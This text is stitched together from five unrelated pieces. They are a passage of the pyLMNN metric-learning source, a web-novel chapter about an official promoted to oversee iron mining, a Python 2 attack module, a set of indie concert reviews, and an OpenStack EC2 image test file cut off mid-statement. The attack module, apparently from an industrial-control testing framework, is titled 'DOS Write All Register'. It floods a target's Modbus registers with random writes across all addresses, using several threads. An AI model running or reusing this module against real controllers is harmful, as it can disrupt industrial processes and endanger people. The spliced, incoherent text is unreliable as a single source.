An array of neighbors indices for each sample.
"""
t_start = time.time()
if self.verbose:
print('[{}] Finding the target neighbors...'.format(
self.__class__.__name__))
sys.stdout.flush()
neighbors_params = self.neighbors_params
if neighbors_params is None:
neighbors_params = {}
neighbors_params.setdefault('n_jobs', self.n_jobs)
target_neighbors = _select_target_neighbors(
X, y, self.n_neighbors_, classes=classes, **neighbors_params)
if self.verbose:
print('[{}] Found the target neighbors in {:5.2f}s.'.format(
self.__class__.__name__, time.time() - t_start))
return target_neighbors
def _compute_grad_static(self, X, target_neighbors):
"""Compute the gradient contributed by the target neighbors.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
target_neighbors : array, shape (n_samples, n_neighbors)
The k nearest neighbors of each sample from the same class.
Returns
-------
grad_target_neighbors, shape (n_features, n_features)
An array with the sum of all outer products of
(sample, target_neighbor) pairs.
"""
t_grad_static = time.time()
if self.verbose:
print('[{}] Computing static part of the gradient...'.format(
self.__class__.__name__))
n_samples, n_neighbors = target_neighbors.shape
row = np.repeat(range(n_samples), n_neighbors)
col = target_neighbors.ravel()
tn_graph = csr_matrix((np.ones(target_neighbors.size), (row, col)),
shape=(n_samples, n_samples))
grad_target_neighbors = _sum_weighted_outer_differences(X, tn_graph)
if self.verbose:
t_grad_static = time.time() - t_grad_static
print('[{}] Computed static part of the gradient in {:5.2f}s.'
.format(self.__class__.__name__, t_grad_static))
return grad_target_neighbors
def _callback(self, transformation):
"""Called after each iteration of the optimizer.
Parameters
----------
transformation : array, shape(n_components, n_features)
The solution computed by the optimizer in this iteration.
"""
if self.callback is not None:
self.callback(transformation, self.n_iter_)
self.n_iter_ += 1
def _loss_grad_lbfgs(self, transformation, X, y, classes, target_neighbors,
grad_static, use_sparse):
"""Compute the loss and the loss gradient w.r.t. ``transformation``.
Parameters
----------
transformation : array, shape (n_components * n_features,)
The current (flattened) linear transformation.
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding training labels.
classes : array, shape (n_classes,)
The non-singleton classes, encoded as integers in [0, n_classes).
target_neighbors : array, shape (n_samples, n_neighbors)
The target neighbors of each sample.
grad_static : array, shape (n_features, n_features)
The (weighted) gradient component caused by target neighbors,
that stays fixed throughout the algorithm.
use_sparse : bool
Whether to use a sparse matrix to store the impostors.
Returns
-------
loss: float
The loss based on the given transformation.
grad: array, shape (n_components * n_features,)
The new (flattened) gradient of the loss.
"""
n_samples, n_features = X.shape
transformation = transformation.reshape(-1, n_features)
self.components_ = transformation
if self.n_iter_ == 0:
self.n_iter_ += 1
if self.verbose:
header_fields = ['Iteration', 'Objective Value',
'#Active Triplets', 'Time(s)']
header_fmt = '{:>10} {:>20} {:>20} {:>10}'
header = header_fmt.format(*header_fields)
cls_name = self.__class__.__name__
print('[{}]'.format(cls_name))
print('[{}] {}\n[{}] {}'.format(cls_name, header,
cls_name, '-' * len(header)))
t_funcall = time.time()
X_embedded = self._transform_without_checks(X)
# Compute (squared) distances to the target neighbors
n_neighbors = target_neighbors.shape[1]
dist_tn = np.zeros((n_samples, n_neighbors))
for k in range(n_neighbors):
dist_tn[:, k] = row_norms(X_embedded -
X_embedded[target_neighbors[:, k]],
squared=True)
# Add the margin to all (squared) distances to target neighbors
dist_tn += 1
# Find the impostors and compute (squared) distances to them
impostors_graph = self._find_impostors(
X_embedded, y, classes, dist_tn[:, -1], use_sparse)
# Compute the push loss and its gradient
loss, grad_new, n_active_triplets = \
_compute_push_loss(X, target_neighbors, dist_tn, impostors_graph)
# Compute the total gradient
grad = np.dot(transformation, grad_static + grad_new)
grad *= 2
# Add the (weighted) pull loss to the total loss
metric = np.dot(transformation.T, transformation)
loss += np.dot(grad_static.ravel(), metric.ravel())
if self.verbose:
t_funcall = time.time() - t_funcall
values_fmt = '[{}] {:>10} {:>20.6e} {:>20,} {:>10.2f}'
print(values_fmt.format(self.__class__.__name__, self.n_iter_,
loss, n_active_triplets, t_funcall))
sys.stdout.flush()
return loss, grad.ravel()
def _find_impostors(self, X_embedded, y, classes, margin_radii,
use_sparse=True):
"""Compute the (sample, impostor) pairs exactly.
Parameters
----------
X_embedded : array, shape (n_samples, n_components)
An array of transformed samples.
y : array, shape (n_samples,)
The corresponding (possibly encoded) class labels.
classes : array, shape (n_classes,)
The non-singleton classes, encoded as integers in [0, n_classes).
margin_radii : array, shape (n_samples,)
(Squared) distances of samples to their farthest target
neighbors plus margin.
use_sparse : bool, optional (default=True)
Whether to use a sparse matrix to store the (sample, impostor)
pairs.
Returns
-------
impostors_graph : coo_matrix, shape (n_samples, n_samples)
Element (i, j) is the distance between samples i and j if j is an
impostor to i, otherwise zero.
"""
n_samples = X_embedded.shape[0]
if use_sparse:
# Initialize a sparse (indicator) matrix for impostors storage
impostors_sp = csr_matrix((n_samples, n_samples), dtype=np.int8)
for class_id in classes[:-1]:
ind_in, = np.where(y == class_id)
ind_out, = np.where(y > class_id)
# Split ind_out x ind_in into chunks of a size that fits
# in memory
imp_ind = _find_impostors_blockwise(
X_embedded[ind_out], X_embedded[ind_in],
margin_radii[ind_out], margin_radii[ind_in])
if len(imp_ind):
# sample impostors if they are too many
if len(imp_ind) > self.max_impostors:
imp_ind = self.random_state_.choice(
imp_ind, self.max_impostors, replace=False)
dims = (len(ind_out), len(ind_in))
ii, jj = np.unravel_index(imp_ind, shape=dims)
# Convert indices to refer to the original data matrix
imp_row = ind_out[ii]
imp_col = ind_in[jj]
new_imp = csr_matrix((np.ones(len(imp_row), dtype=np.int8),
(imp_row, imp_col)), dtype=np.int8,
shape=(n_samples, n_samples))
impostors_sp = impostors_sp + new_imp
impostors_sp = impostors_sp.tocoo(copy=False)
imp_row = impostors_sp.row
imp_col = impostors_sp.col
# Make sure we do not exceed max_impostors
n_impostors = len(imp_row)
if n_impostors > self.max_impostors:
ind_sampled = self.random_state_.choice(
n_impostors, self.max_impostors, replace=False)
imp_row = imp_row[ind_sampled]
imp_col = imp_col[ind_sampled]
imp_dist = _paired_distances_blockwise(X_embedded, imp_row,
imp_col)
else:
# Initialize lists for impostors storage
imp_row, imp_col, imp_dist = [], [], []
for class_id in classes[:-1]:
ind_in, = np.where(y == class_id)
ind_out, = np.where(y > class_id)
# Split ind_out x ind_in into chunks of a size that fits in
# memory
imp_ind, dist_batch = _find_impostors_blockwise(
X_embedded[ind_out], X_embedded[ind_in],
margin_radii[ind_out], margin_radii[ind_in],
return_distance=True)
if len(imp_ind):
# sample impostors if they are too many
if len(imp_ind) > self.max_impostors:
ind_sampled = self.random_state_.choice(
len(imp_ind), self.max_impostors, replace=False)
imp_ind = imp_ind[ind_sampled]
dist_batch = dist_batch[ind_sampled]
dims = (len(ind_out), len(ind_in))
ii, jj = np.unravel_index(imp_ind, shape=dims)
# Convert indices to refer to the original data matrix
imp_row.extend(ind_out[ii])
imp_col.extend(ind_in[jj])
imp_dist.extend(dist_batch)
imp_row = np.asarray(imp_row, dtype=np.intp)
imp_col = np.asarray(imp_col, dtype=np.intp)
imp_dist = np.asarray(imp_dist)
# Make sure we do not exceed max_impostors
n_impostors = len(imp_row)
if n_impostors > self.max_impostors:
ind_sampled = self.random_state_.choice(
n_impostors, self.max_impostors, replace=False)
imp_row = imp_row[ind_sampled]
imp_col = imp_col[ind_sampled]
imp_dist = imp_dist[ind_sampled]
impostors_graph = coo_matrix((imp_dist, (imp_row, imp_col)),
shape=(n_samples, n_samples))
return impostors_graph
########################
# Some core functions #
#######################
def _select_target_neighbors(X, y, n_neighbors, classes=None, **nn_kwargs):
"""Find the target neighbors of each data sample.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding (encoded) training labels.
n_neighbors : int
The number of target neighbors to select for each sample in X.
classes : array, shape (n_classes,), optional (default=None)
The non-singleton classes, encoded as integers in [0, n_classes).
If None (default), they will be inferred from ``y``.
**nn_kwargs : keyword arguments
Parameters to be passed to a :class:`neighbors.NearestNeighbors`
instance except from ``n_neighbors``.
Returns
-------
target_neighbors: array, shape (n_samples, n_neighbors)
The indices of the target neighbors of each sample.
"""
target_neighbors = np.zeros((X.shape[0], n_neighbors), dtype=np.intp)
nn = NearestNeighbors(n_neighbors=n_neighbors, **nn_kwargs)
if classes is None:
classes = np.unique(y)
for class_id in classes:
ind_class, = np.where(y == class_id)
nn.fit(X[ind_class])
neigh_ind = nn.kneighbors(return_distance=False)
target_neighbors[ind_class] = ind_class[neigh_ind]
return target_neighbors
def _find_impostors_blockwise(X_a, X_b, radii_a, radii_b,
return_distance=False, block_size=8):
"""Find (sample, impostor) pairs in blocks to avoid large memory usage.
Parameters
----------
X_a : array, shape (n_samples_a, n_components)
Transformed data samples from class A.
X_b : array, shape (n_samples_b, n_components)
Transformed data samples from class B.
radii_a : array, shape (n_samples_a,)
Squared distances of the samples in ``X_a`` to their margins.
radii_b : array, shape (n_samples_b,)
Squared distances of the samples in ``X_b`` to their margins.
block_size : int, optional (default=8)
The maximum number of mebibytes (MiB) of memory to use at a time for
calculating paired squared distances.
return_distance : bool, optional (default=False)
Whether to return the squared distances to the impostors.
Returns
-------
imp_indices : array, shape (n_impostors,)
Unraveled indices of (sample, impostor) pairs referring to a matrix
of shape (n_samples_a, n_samples_b).
imp_distances : array, shape (n_impostors,), optional
imp_distances[i] is the squared distance between samples imp_row[i] and
imp_col[i], where
imp_row, imp_col = np.unravel_index(imp_indices, shape=(n_samples_a,
n_samples_b))
"""
n_samples_a = X_a.shape[0]
bytes_per_row = X_b.shape[0] * X_b.itemsize
block_n_rows = int(block_size*1024*1024 // bytes_per_row)
imp_indices, imp_distances = [], []
# X_b squared norm stays constant, so pre-compute it to get a speed-up
X_b_norm_squared = row_norms(X_b, squared=True)[np.newaxis, :]
for chunk in gen_batches(n_samples_a, block_n_rows):
# The function `sklearn.metrics.pairwise.euclidean_distances` would
# add an extra ~8% time of computation due to input validation on
# every chunk and another ~8% due to clipping of negative values.
distances_ab = _euclidean_distances_without_checks(
X_a[chunk], X_b, squared=True, Y_norm_squared=X_b_norm_squared,
clip=False)
ind_b, = np.where((distances_ab < radii_a[chunk, None]).ravel())
ind_a, = np.where((distances_ab < radii_b[None, :]).ravel())
ind = np.unique(np.concatenate((ind_a, ind_b)))
if len(ind):
ind_plus_offset = ind + chunk.start * X_b.shape[0]
imp_indices.extend(ind_plus_offset)
if return_distance:
# We only need to do clipping if we return the distances.
distances_chunk = distances_ab.ravel()[ind]
# Clip only the indexed (unique) distances
np.maximum(distances_chunk, 0, out=distances_chunk)
imp_distances.extend(distances_chunk)
imp_indices = np.asarray(imp_indices)
if return_distance:
return imp_indices, np.asarray(imp_distances)
else:
return imp_indices
def _compute_push_loss(X, target_neighbors, dist_tn, impostors_graph):
"""
Parameters
----------
X : array, shape (n_samples, n_features)
The training input samples.
target_neighbors : array, shape (n_samples, n_neighbors)
Indices of target neighbors of each sample.
dist_tn : array, shape (n_samples, n_neighbors)
(Squared) distances of samples to their target neighbors.
impostors_graph : coo_matrix, shape (n_samples, n_samples)
Element (i, j) is the distance between sample i and j if j is an
impostor to i, otherwise zero.
Returns
-------
loss : float
The push loss caused by the given target neighbors and impostors.
grad : array, shape (n_features, n_features)
The gradient of the push loss.
n_active_triplets : int
The number of active triplet constraints.
"""
n_samples, n_neighbors = dist_tn.shape
imp_row = impostors_graph.row
imp_col = impostors_graph.col
dist_impostors = impostors_graph.data
loss = 0
shape = (n_samples, n_samples)
A0 = csr_matrix(shape)
sample_range = range(n_samples)
n_active_triplets = 0
for k in range(n_neighbors - 1, -1, -1):
loss1 = np.maximum(dist_tn[imp_row, k] - dist_impostors, 0)
ac, = np.where(loss1 > 0)
n_active_triplets += len(ac)
A1 = csr_matrix((2 * loss1[ac], (imp_row[ac], imp_col[ac])), shape)
loss2 = np.maximum(dist_tn[imp_col, k] - dist_impostors, 0)
ac, = np.where(loss2 > 0)
n_active_triplets += len(ac)
A2 = csc_matrix((2 * loss2[ac], (imp_row[ac], imp_col[ac])), shape)
val = (A1.sum(1).ravel() + A2.sum(0)).getA1()
A3 = csr_matrix((val, (sample_range, target_neighbors[:, k])), shape)
A0 = A0 - A1 - A2 + A3
loss += np.dot(loss1, loss1) + np.dot(loss2, loss2)
grad = _sum_weighted_outer_differences(X, A0)
return loss, grad, n_active_triplets
##########################
# Some helper functions #
#########################
def _paired_distances_blockwise(X, ind_a, ind_b, squared=True, block_size=8):
"""Equivalent to row_norms(X[ind_a] - X[ind_b], squared=squared).
Parameters
----------
X : array, shape (n_samples, n_features)
An array of data samples.
ind_a : array, shape (n_indices,)
An array of sample indices.
ind_b : array, shape (n_indices,)
Another array of sample indices.
squared : bool (default=True)
Whether to return the squared distances.
block_size : int, optional (default=8)
The maximum number of mebibytes (MiB) of memory to use at a time for
calculating paired (squared) distances.
Returns
-------
distances: array, shape (n_indices,)
An array of pairwise, optionally squared, distances.
"""
bytes_per_row = X.shape[1] * X.itemsize
batch_size = int(block_size*1024*1024 // bytes_per_row)
n_pairs = len(ind_a)
distances = np.zeros(n_pairs)
for chunk in gen_batches(n_pairs, batch_size):
distances[chunk] = row_norms(X[ind_a[chunk]] - X[ind_b[chunk]], True)
return distances if squared else np.sqrt(distances, out=distances)
def _sum_weighted_outer_differences(X, weights):
"""Compute the sum of weighted outer pairwise differences.
Parameters
----------
X : array, shape (n_samples, n_features)
An array of data samples.
weights : csr_matrix, shape (n_samples, n_samples)
A sparse weights matrix.
Returns
-------
sum_weighted_outer_diffs : array, shape (n_features, n_features)
The sum of all outer weighted differences.
"""
weights_sym = weights + weights.T
diagonal = weights_sym.sum(1).getA()
laplacian_dot_X = diagonal * X - safe_sparse_dot(weights_sym, X,
dense_output=True)
result = np.dot(X.T, laplacian_dot_X)
return result
def _check_scalar(x, name, target_type, min_val=None, max_val=None):
"""Validate scalar parameters type and value.
Parameters
----------
x : object
The scalar parameter to validate.
name : str
The name of the parameter to be printed in error messages.
target_type : type or tuple
Acceptable data types for the parameter.
min_val : float or int, optional (default=None)
The minimum value value the parameter can take. If None (default) it
is implied that the parameter does not have a lower bound.
max_val: float or int, optional (default=None)
The maximum valid value the parameter can take. If None (default) it
is implied that the parameter does not have an upper bound.
Raises
-------
TypeError
If the parameter's type does not match the desired type.
ValueError
If the parameter's value violates the given bounds.
"""
if not isinstance(x, target_type):
raise TypeError('`{}` must be an instance of {}, not {}.'
.format(name, target_type, type(x)))
if min_val is not None and x < min_val:
raise ValueError('`{}`= {}, must be >= {}.'.format(name, x, min_val))
if max_val is not None and x > max_val:
raise ValueError('`{}`= {}, must be <= {}.'.format(name, x, max_val))
#####################################################################
# Convenience function to construct the trivial LMNN - KNN pipeline #
#####################################################################
def make_lmnn_pipeline(
n_neighbors=3, n_components=None, init='pca', warm_start=False,
max_impostors=500000, neighbors_params=None, weight_push_loss=0.5,
impostor_store='auto', max_iter=50, tol=1e-5, callback=None,
store_opt_result=False, verbose=0, random_state=None, n_jobs=1,
n_neighbors_predict=None, weights='uniform', algorithm='auto',
leaf_size=30, n_jobs_predict=None, **kwargs):
"""Constructs a LargeMarginNearestNeighbor - KNeighborsClassifier pipeline.
See LargeMarginNearestNeighbor module documentation for details.
Parameters
----------
n_neighbors_predict : int, optional (default=None)
The number of neighbors to use during prediction. If None (default)
the value of ``n_neighbors`` used to train the model is used.
weights : str or callable, optional (default = 'uniform')
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
n_jobs_predict : int, optional (default=None)
The number of parallel jobs to run for neighbors search during
prediction. If None (default), then the value of ``n_jobs`` is used.
memory : None, str or object with the joblib.Memory interface, optional
Used to cache the fitted transformers of the pipeline. By default,
no caching is performed. If a string is given, it is the path to
the caching directory. Enabling caching triggers a clone of
the transformers before fitting. Therefore, the transformer
instance given to the pipeline cannot be inspected
directly. Use the attribute ``named_steps`` or ``steps`` to
inspect estimators within the pipeline. Caching the
transformers is advantageous when fitting is time consuming.
Returns
-------
lmnn_pipe : Pipeline
A Pipeline instance with two steps: a ``LargeMarginNearestNeighbor``
instance that is used to fit the model and a ``KNeighborsClassifier``
instance that is used for prediction.
Examples
--------
>>> from pylmnn import make_lmnn_pipeline
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import train_test_split
>>> X, y = load_iris(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... stratify=y, test_size=0.7, random_state=42)
>>> lmnn_pipe = make_lmnn_pipeline(n_neighbors=3, n_neighbors_predict=3,
... random_state=42)
>>> lmnn_pipe.fit(X_train, y_train) # doctest: +ELLIPSIS
Pipeline(...)
>>> print(lmnn_pipe.score(X_test, y_test))
0.971428571429
"""
memory = kwargs.pop('memory', None)
if kwargs:
raise TypeError('Unknown keyword arguments: "{}"'
.format(list(kwargs.keys())[0]))
lmnn = LargeMarginNearestNeighbor(
n_neighbors=n_neighbors, n_components=n_components, init=init,
warm_start=warm_start, max_impostors=max_impostors,
neighbors_params=neighbors_params, weight_push_loss=weight_push_loss,
impostor_store=impostor_store, max_iter=max_iter, tol=tol,
callback=callback, store_opt_result=store_opt_result, verbose=verbose,
random_state=random_state, n_jobs=n_jobs)
if n_neighbors_predict is None:
n_neighbors_predict = n_neighbors
if n_jobs_predict is None:
n_jobs_predict = n_jobs
knn = KNeighborsClassifier(
n_neighbors=n_neighbors_predict, weights=weights, algorithm=algorithm,
leaf_size=leaf_size, n_jobs=n_jobs_predict)
return Pipeline([('lmnn', lmnn), ('knn', knn)], memory=memory)
|
The next morning, after Ren Baqian woke up, he washed himself up and began to pack his belongings. After which, he went to see the empress.
This time around, the meeting place wasn't the usual Yangxin Palace Hall. Instead, it was the throne room. This was the first time Ren Baqian had come here.
By the time he reached the throne room, the empress was already seated upon a golden throne on an elevated platform. There were already a few people standing beneath her.
"Greetings, Your Majesty." After greeting the empress, Ren Baqian stood to one side in a well-behaved manner and examined those people. One of them was a burly man clad in metallic armor with a helmet in his hand. There was a feather sticking out of the top of his helmet. The burly man's skin was bronze in color, and he looked as though he was thirty-something years old. He was a military officer that was of Standard class, Rank 6.
Other than him, there were two other men. One of them had a very thick beard, and he looked approximately forty years old. Right now, he was examining Ren Baqian closely.
The other man looked as though he was close to forty years old. When compared to the aboriginals, his body was considered slightly petite. However, he was still bigger than Ren Baqian.
The former was wearing a Secondary class, Rank 3 official robe while the latter was wearing a Secondary class, Rank 5 official robe.
"Ren Baqian!" The empress's cold voice resounded through the air.
"Yes, Your Majesty." Ren Baqian quickly took a few steps forward and faced the empress.
"Storyteller Ren Baqian of Qingxin Palace Hall is extremely capable, loyal, and responsible. I hereby promote you to Imperial Deputy Prefect. You are to take office immediately."
Ren Baqian was stunned. Following which, he kneeled down on one knee and replied, "Thank you, Your Majesty."
Ren Baqian was still in a daze. He was promoted after arriving here for merely two minutes. Furthermore, he was promoted to Imperial Deputy Prefect, which was of Secondary class, Rank 5. The speed at which he was promoted was faster than a rocket's.
Ren Baqian had been in this world for less than three months, but he had already completed walking a path that an ordinary Dayao citizen would take a lifetime to complete.
Even an ordinary official or general that had obtained great meritorious service wasn't promoted so quickly.
However, the three other persons weren't surprised by Ren Baqian's promotion at all.
After all, they all knew who Ren Baqian was. If nothing went wrong, this person would become the prince consort in the future. This official position was merely a stepping stone for him.
Furthermore, the position of Imperial Deputy Prefect was responsible for various important matters in the imperial palace. This position was different from an ordinary position in the six departments of the imperial court or a military position.
"Imperial Deputy Prefect Ren Baqian will be in charge of this mission and Overseer of Military Arms, Tao Jiyuan, will be his assistant. I want you to inspect Mount Damo and Mount Liucui and see if there's any solution to increasing our output of iron. If you succeed, I will reward you handsomely."
"Yes, Your Majesty," Ren Baqian and Tao Jiyuan bowed and replied.
When Ren Baqian heard these words, he knew why the empress promoted him. An official position of Secondary class, Rank 8 wasn't high enough for him to be in charge of this mission.
After he was promoted to Imperial Deputy Prefect, his rank would be similar to that Overseer of Military Arms. Furthermore, given his unique status, he was definitely worthy to be in charge of this matter.
"Teng Ji, Colonel of Winged Guards, lead three hundred winged cavalry to protect them along the way. You will be fully responsible for anything that goes wrong," the empress continued with a cold voice.
"Yes, Your Majesty," the armor-clad general immediately replied.
Naturally, he knew who the empress wanted him to protect.
If both of them encountered danger at the same time, even if he died, he had to bring Deputy Prefect Ren back alive.
Otherwise, he would have to die to atone for his sin.
"Go back and make your preparations, set off after noon. Ren Baqian, you remain here." After the empress finished speaking, Tao Jiyuan and Teng Ji left the throne room.
"I am Overseer of Military Arms, Feng Hou, I have something to ask you."
"Greetings, Overseer of Military Arms." Ren Baqian turned around and cupped his fists.
"Deputy Prefect Ren, how confident are you with regards to the matter of increasing the output of iron ores from the mine?" Feng Hou asked Ren Baqian.
"That will have to depend on the amount of iron ore and their distribution in the mines. If extraction of the iron ores is the only problem, I might have some solutions," Ren Baqian pondered for a while before replying Feng Hou.
"According to Her Majesty, Deputy Prefect Ren has means to smelt iron ores and forge weapons too? Can you tell me how are you going to do it? This way, I can make some preparations too," Feng Hou asked again.
"The main issues with smelting iron ores are insufficient heat and unstable temperature. A simple solution to these two issues is box bellows. However, if you want to do it for a long period of time, you will need a blast furnace. It doesn't require much skill to operate. Furthermore, it doesn't require many components and the stability of its temperature is very high. If the steel that is produced contains very little impurities, we can directly use it to forge weapons. This will save a lot of manpower," Ren Baqian explained.
"What is a box bellows? What is a blast furnace? What is steel?" Feng Hou furrowed his eyebrows and asked three questions in a row.
With regards to the husband chose by Her Majesty, Feng Hou shared the same sentiments as everyone else. Ren Baqian did not seem at all capable, otherwise, everyone wouldn't have raised objections to the empress's decision back then.
Ren Baqian was weak and delicate. Other than bootlicking, he did not seem to have any other capabilities.
This morning, Her Majesty summoned them and told them something.
Her Majesty wanted to increase the iron output from the iron mines.
Her Majesty wasn't the only one that had been racking her brain to come up with a solution to this matter. The entire Ministry of Works had been doing so as well. In reality, it was too hard to extract iron ores from the two iron mines.
For so many years, they had been extracting iron ore from the mines bit by bit. Countless people had racked their brains to no avail. Everyone felt that extracting iron ore from the mines bit by bit was the only way.
This time around, Her Majesty wanted Ren Baqian to inspect the mines and think of a solution.
If this was the only thing that the empress wanted Ren Baqian to do, Feng Hou had no objections with it at all. If Ren Baqian succeeded, he would benefit as well. If Ren Baqian failed, it had nothing to do with him at all. After all, he was the Overseer of Military Arms.
However, when he heard that Her Majesty wanted Ren Baqian to interfere with the matters of smelting iron ores and forging weapons, he could not help but to raise objections. If Ren Baqian interfered with these matters, what was the point of having him as the Overseer of Military Arms?
Furthermore, does Ren Baqian really know how to extract iron ore from iron mines, smelt iron ore, and forge weapons?
If Ren Baqian was truly capable, everyone in the Department of Military Arms would listen to him. Otherwise, Feng Hou would definitely not let him interfere with the affairs of Department of Military Arms.
Therefore, he decided to ask this Storyteller Ren some questions.
Ren Baqian did not mind Feng Hou asking him these questions.
"You can try making a box bellows. It's a huge box with a handle that can be pulled and pushed on one side. It must also have a valve for air to enter. A person operating it will have to push and pull the handle to channel air into it. Air contains oxygen. Sufficient oxygen will allow the fire to burn better and longer. Furthermore, if there is a person that keeps on pulling and pushing the handle, the fire will be more stable and the temperature of the fire will be higher. These conditions will improve the smelting process" Ren Baqian gave Feng Hou a rough explanation.
"Now, I will talk about the blast furnace. First, I will explain what steel is. A weapon that is made out of ordinary iron is very weak. Therefore, we will have to remove the impurities from the iron and add a little carbon to it. Eventually, we will obtain steel A blast furnace will directly remove the impurities in the iron during the smelting process and this process will produce steel. This way, we can save a lot of manpower, time and effort" Ren Baqian continued.
Feng Hou knitted his eyebrows. He did not understand what Ren Baqian had said. However, Ren Baqian's words did sound pretty awesome.
After staying in the Department of Military Arms for over ten years, Feng Hou knew pretty much everything about smelting iron ore and forging weapons. However, he did not understand anything that Ren Baqian had just told him.
When the empress saw the troubled look on Feng Hou's face, her lips curled upwards.
This was what she wanted to see.
Of course, she knew what everyone was worrying about.
It was her own decision that she chose Ren Baqian as her husband and no one else had the right to interfere with her decision. However, she was still annoyed at the fact that everyone was looking down on her decision.
Even if Feng Hou did not raise his doubts regarding Ren Baqian now, she would find him an opportunity to do so sooner or later.
|
import os
import threading
import random
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
from System.Lib import ipcalc
down = False
class Module:
info = {
'Name': 'DOS Write All Register',
'Author': ['@enddo'],
'Description': ("DOS With Write All Register Function"),
}
options = {
'RHOST' :['' ,True ,'The target IP address'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :['' ,True ,'Modbus Slave UID.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[False ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start'
for i in range(int(self.options['Threads'][0])):
if(self.options['RHOST'][0]):
thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],))
thread.start()
THREADS.append(thread)
else:
break
for thread in THREADS:
thread.join()
if(down):
self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING)
break
if(self.options['Output'][0]):
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self,str,color):
self.output += str + '\n'
if(str.find('[+]') != -1):
print str.replace('[+]',color + '[+]' + bcolors.ENDC)
elif(str.find('[-]') != -1):
print str.replace('[-]',color + '[+]' + bcolors.ENDC)
else:
print str
def do(self,ip):
global down
for i in range(0xffff):
if(down):
break
c = connectToTarget(ip,self.options['RPORT'][0])
if(c == None):
down = True
return None
try:
self.printLine('[+] Write on Register Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(hex(i|0x1111),16),registerValue=int(hex(random.randint(0,16**4-1)|0x1111),16)),timeout=timeout, verbose=0)
ans = ModbusADU_Answer(str(ans))
self.printLine('[+] Response is :',bcolors.OKGREEN)
ans.show()
except:
pass
|
NYC electropop group Hooray for Earth employs ferocious beats and five reverb-loving vocalists to create a huge, warm and danceable sound.
Watching Owen Pallett piece together his gorgeous symphonic pop compositions on stage is an engrossing experience. Using loop pedals, he adds one layer at a time, with his violin serving as a lead, rhythm and even percussion instrument all at once. He announced that this would likely be his last solo show, as he recently started playing with a drummer.
Surfer Blood‘s set got cut off after only five songs, which was especially unfortunate considering they now have new material to show off. They did manage to play two rocking new songs, though.
On record, Seattle’s Telekinesis is just Michael Benjamin Lerner, but live, he enlists a full band to recreate his enjoyable power pop songs.
Menomena‘s engaging rock made skillful use of piano and saxophone.
Okkervil River only got to play for half an hour, but they made the most of it, tearing through favorites like “For Real” and “Our Life is Not a Movie or Maybe” as well as two tracks from their upcoming album, I am Very Far. As Will Sheff kicked off the clapping for closer “Unless It’s Kicks,” he said “Put your hands up! I want to ruin you for all the other bands you’re going to see today.” And they basically did, until their nighttime set (see below).
Philadelphia guitar-and-drums duo Reading Rainbow plays bouncy, cheery pop with sweet vocal harmonies.
NYC rock trio Yellow Ostrich manages to sound like a much larger band thanks to the use of loops, horns, and powerful drumbeats.
Judging by the four new songs Okkervil River played during their second set of the day, including the surprisingly heavy “The Valley” and the hard-hitting waltz “Wake and Feel Fine,” their new album may turn out to contain some of their most powerful material yet.
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
import testtools
from ec2api.tests.functional import base
from ec2api.tests.functional import config
CONF = config.CONF
class ImageTest(base.EC2TestCase):
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_ebs_image_type(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertEqual("ebs", image['RootDeviceType'],
"Image is not EBS image")
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_ebs_image_volume_properties(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertTrue(image['RootDeviceName'])
self.assertTrue(image['BlockDeviceMappings'])
device_name = image['RootDeviceName']
bdm = image['BlockDeviceMappings']
bdm = [v for v in bdm if v['DeviceName'] == device_name]
self.assertEqual(1, len(bdm))
bdm = bdm[0]
self.assertIn('Ebs', bdm)
ebs = bdm['Ebs']
self.assertIsNotNone(ebs.get('SnapshotId'))
self.assertIsNotNone(ebs.get('DeleteOnTermination'))
self.assertIsNotNone(ebs.get('VolumeSize'))
if CONF.aws.run_incompatible_tests:
